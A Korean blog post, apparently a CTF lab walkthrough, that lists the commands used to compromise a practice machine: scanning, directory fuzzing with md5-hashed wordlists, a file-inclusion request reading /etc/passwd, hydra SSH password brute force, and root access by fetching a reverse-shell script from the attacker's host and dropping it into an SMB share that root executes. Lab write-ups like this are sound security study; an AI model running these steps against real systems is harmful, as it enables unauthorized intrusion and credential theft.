반응형
netdiscover -r 192.168.16.0/24 - 192.168.16.93 발견
nmap -sC -sV -p- 192.168.16.93 - 22, 80번 포트 open 확인
atlas.jpg를 확인해보면
이미지 중간에 지도가 있는데 확인해보면 md5 해쉬함수를 샤용한다는 힌트를 얻을 수 있다.
dirb http://192.168.16.93
gobuster dir -u http://192.168.16.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt - 별다른 결과가 없음
gobuster dir -u http://192.168.16.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,zip,bak,backup - 확장자 추가 크게 나온는게 없음
gobuster -u http://192.168.16.93 - 해도 뭐없음...
for i in $(cat /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt); do echo "$i" | md5sum >> dir.txt; done - 힌트에서 md5해쉬알고리즘을 받았기 때문에 md5로
#그리고 txt파일을 살펴보면 -랑 공백이 해시화 된 문자열뒤에 생기기 때문에 vi로 지워준다.
ex) :%s/-//g, :%s/ //g
#그리고 다시 dirbuster나 여러가지 적용해봄
gobuster dir -u http://192.168.16.93 -w dir.txt # 하나해당하는거 발견
ffuf -w dir.txt -u http://192.168.16.93/~.php?FUZZ=/etc/passwd -fs 0 -t 200; - purpose 파라미터 발견
freddie라는 일반 유저 계정이 있는 것을 확인
hydra -l freddie -P dir.txt ssh://192.168.16.93 - freddie 계정 알기 때문에 -i 모르면 -I 패스워드를 모르기 때문에 -P 알면 -p
#비밀번호를 알아냈음
ssh freddie@192.168.16.93
#접속
sudo -l - sudo가 없음
find / -user root -perm -u=s -type f - 특별히 없음
ss -tupln - 포트 리스닝 확인 139번, 445번 열려있는 거 확인
smbclient -L 127.0.0.1 - grotesque 공유폴더 확인
smbclient //127.0.0.1/grotesque - 접속
python3 -m http.server - 다른 cmd에서 파이썬으로 http.server구축 명령어 쓴 곳이 home directory가 됨
#원격접속한 cmd에서
wget http://192.168.16.80:8000/reverse-shell.sh - 공격자 ip
smbclient //127.0.0.1/grotesque
put reverse-shell.sh grotesque #하고 다른 cmd에서 nc -lvnp 해서 대기하면 성공
#이게 가능한 이유는 pspy64등으로 process가 실행하는 명령어를 살펴보면 이 시스템에서는 특수하게
#root권한이 /bin/sh -c bash /smbshare/* 을 실행하고 있기 때문에 루트권한을 획득할 수 있다.반응형
'CTF' 카테고리의 다른 글
| CTF)Keyring (1) | 2025.09.12 |
|---|---|
| CTF) Hackable 3 (0) | 2025.09.10 |
| CTF)Momentum 1 (0) | 2025.09.04 |
| CTF)Matrix-Breakout2 Morpheus (0) | 2025.08.29 |
| CTF) LupinOne (0) | 2025.08.26 |